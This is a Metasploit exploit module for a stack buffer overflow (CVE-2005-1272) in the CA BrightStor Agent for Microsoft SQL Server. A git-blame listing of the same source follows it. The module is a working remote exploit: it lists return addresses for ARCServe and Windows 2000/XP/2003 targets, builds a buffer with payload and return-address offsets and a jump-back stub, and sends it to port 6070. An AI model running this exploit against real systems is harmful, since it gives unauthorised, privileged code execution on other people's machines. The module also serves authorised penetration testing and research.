modules/exploits/windows/brightstor/sql_agent.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CA BrightStor Agent for Microsoft SQL Overflow',
      'Description'    => %q{
          This module exploits a vulnerability in the CA BrightStor
        Agent for Microsoft SQL Server. This vulnerability was
        discovered by cybertronic[at]gmx.net.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-1272'],
          [ 'OSVDB', '18501' ],
          [ 'BID', '14453'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities'],
          [ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239'],
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform'      => %w{ win },
      'Targets'        =>
        [
          # This exploit requires a jmp esp for return
          ['ARCServe 11.0 Asbrdcst.dll 12/12/2003',     { 'Platform' => 'win', 'Ret' => 0x20c11d64 }], # jmp esp
          ['ARCServe 11.1 Asbrdcst.dll 07/21/2004',     { 'Platform' => 'win', 'Ret' => 0x20c0cd5b }], # push esp, ret
          ['ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005', { 'Platform' => 'win', 'Ret' => 0x20c0cd1b }], # push esp, ret

          # Generic jmp esp's
          ['Windows 2000 SP0-SP3 English',              { 'Platform' => 'win', 'Ret' => 0x7754a3ab }], # jmp esp
          ['Windows 2000 SP4 English',                  { 'Platform' => 'win', 'Ret' => 0x7517f163 }], # jmp esp
          ['Windows XP SP0-SP1 English',                { 'Platform' => 'win', 'Ret' => 0x71ab1d54 }], # push esp, ret
          ['Windows XP SP2 English',                    { 'Platform' => 'win', 'Ret' => 0x71ab9372 }], # push esp, ret
          ['Windows 2003 SP0 English',                  { 'Platform' => 'win', 'Ret' => 0x71c03c4d }], # push esp, ret
          ['Windows 2003 SP1 English',                  { 'Platform' => 'win', 'Ret' => 0x71c033a0 }], # push esp, ret
        ],
      'DisclosureDate' => '2005-08-02',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(6070)
      ])
  end


  def exploit

    print_status("Trying target #{target.name}...")

    # The 'one line' request does not work against Windows 2003
    1.upto(5) { |i|

      # Flush some memory
      connect
      begin
        sock.put("\xff" * 0x12000)
        sock.get_once
      rescue
      end
      disconnect


      # 3288 bytes max
      #  696 == good data (1228 bytes contiguous) @ 0293f5e0
      # 3168 == return address
      # 3172 == esp @ 0293ff8c (2476 from good data)

      buf = rand_text_english(3288, payload_badchars)
      buf[ 696, payload.encoded.length ] = payload.encoded
      buf[3168, 4] = [target.ret].pack('V')  # jmp esp
      buf[3172, 5] = "\xe9\x4f\xf6\xff\xff"  # jmp -2476

      connect
      begin
        sock.put(buf)
        sock.get_once
      rescue
      end

      handler
      disconnect
    }
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
Retab modules 2013-08-30 16:28:54 -05:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
Retab modules 2013-08-30 16:28:54 -05:00
Brightstor exploits 2005-11-26 22:12:54 +00:00			`def initialize(info = {})`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
Brightstor exploits 2005-11-26 22:12:54 +00:00			`'Name' => 'CA BrightStor Agent for Microsoft SQL Overflow',`
			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This module exploits a vulnerability in the CA BrightStor`
Brightstor exploits 2005-11-26 22:12:54 +00:00			`Agent for Microsoft SQL Server. This vulnerability was`
			`discovered by cybertronic[at]gmx.net.`
			`},`
			`'Author' => [ 'hdm' ],`
New licensing terms, revision bump to v3 2006-01-21 22:10:20 +00:00			`'License' => MSF_LICENSE,`
Brightstor exploits 2005-11-26 22:12:54 +00:00			`'References' =>`
			`[`
			`[ 'CVE', '2005-1272'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '18501' ],`
Brightstor exploits 2005-11-26 22:12:54 +00:00			`[ 'BID', '14453'],`
			`[ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities'],`
			`[ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239'],`
			`],`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'Space' => 1000,`
			`'BadChars' => "\x00",`
			`'StackAdjustment' => -3500,`
			`},`
Bug #8419 - Added platform info missing on exploits 2013-10-08 22:41:50 -04:00			`'Platform' => %w{ win },`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Targets' =>`
Brightstor exploits 2005-11-26 22:12:54 +00:00			`[`
			`# This exploit requires a jmp esp for return`
			`['ARCServe 11.0 Asbrdcst.dll 12/12/2003', { 'Platform' => 'win', 'Ret' => 0x20c11d64 }], # jmp esp`
			`['ARCServe 11.1 Asbrdcst.dll 07/21/2004', { 'Platform' => 'win', 'Ret' => 0x20c0cd5b }], # push esp, ret`
			`['ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005', { 'Platform' => 'win', 'Ret' => 0x20c0cd1b }], # push esp, ret`
Retab modules 2013-08-30 16:28:54 -05:00
Brightstor exploits 2005-11-26 22:12:54 +00:00			`# Generic jmp esp's`
			`['Windows 2000 SP0-SP3 English', { 'Platform' => 'win', 'Ret' => 0x7754a3ab }], # jmp esp`
			`['Windows 2000 SP4 English', { 'Platform' => 'win', 'Ret' => 0x7517f163 }], # jmp esp`
			`['Windows XP SP0-SP1 English', { 'Platform' => 'win', 'Ret' => 0x71ab1d54 }], # push esp, ret`
			`['Windows XP SP2 English', { 'Platform' => 'win', 'Ret' => 0x71ab9372 }], # push esp, ret`
			`['Windows 2003 SP0 English', { 'Platform' => 'win', 'Ret' => 0x71c03c4d }], # push esp, ret`
			`['Windows 2003 SP1 English', { 'Platform' => 'win', 'Ret' => 0x71c033a0 }], # push esp, ret`
			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2005-08-02',`
Brightstor exploits 2005-11-26 22:12:54 +00:00			`'DefaultTarget' => 0))`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`register_options(`
			`[`
			`Opt::RPORT(6070)`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00

Brightstor exploits 2005-11-26 22:12:54 +00:00			`def exploit`
Retab modules 2013-08-30 16:28:54 -05:00
Bug fixes for alphanum vs alphanumeric 2005-11-27 01:51:50 +00:00			`print_status("Trying target #{target.name}...")`
Retab modules 2013-08-30 16:28:54 -05:00
Brightstor exploits 2005-11-26 22:12:54 +00:00			`# The 'one line' request does not work against Windows 2003`
Typo 2007-05-23 15:51:55 +00:00			`1.upto(5) { \|i\|`
Retab modules 2013-08-30 16:28:54 -05:00
Brightstor exploits 2005-11-26 22:12:54 +00:00			`# Flush some memory`
			`connect`
			`begin`
			`sock.put("\xff" * 0x12000)`
			`sock.get_once`
			`rescue`
			`end`
			`disconnect`
Retab modules 2013-08-30 16:28:54 -05:00

Brightstor exploits 2005-11-26 22:12:54 +00:00			`# 3288 bytes max`
			`# 696 == good data (1228 bytes contiguous) @ 0293f5e0`
			`# 3168 == return address`
			`# 3172 == esp @ 0293ff8c (2476 from good data)`
Retab modules 2013-08-30 16:28:54 -05:00
updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`buf = rand_text_english(3288, payload_badchars)`
Brightstor exploits 2005-11-26 22:12:54 +00:00			`buf[ 696, payload.encoded.length ] = payload.encoded`
			`buf[3168, 4] = [target.ret].pack('V') # jmp esp`
			`buf[3172, 5] = "\xe9\x4f\xf6\xff\xff" # jmp -2476`
Retab modules 2013-08-30 16:28:54 -05:00
Brightstor exploits 2005-11-26 22:12:54 +00:00			`connect`
			`begin`
			`sock.put(buf)`
			`sock.get_once`
			`rescue`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Brightstor exploits 2005-11-26 22:12:54 +00:00			`handler`
			`disconnect`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`}`
Brightstor exploits 2005-11-26 22:12:54 +00:00			`end`
osvdb references from Steve Tornio 2009-05-19 13:20:32 +00:00			`end`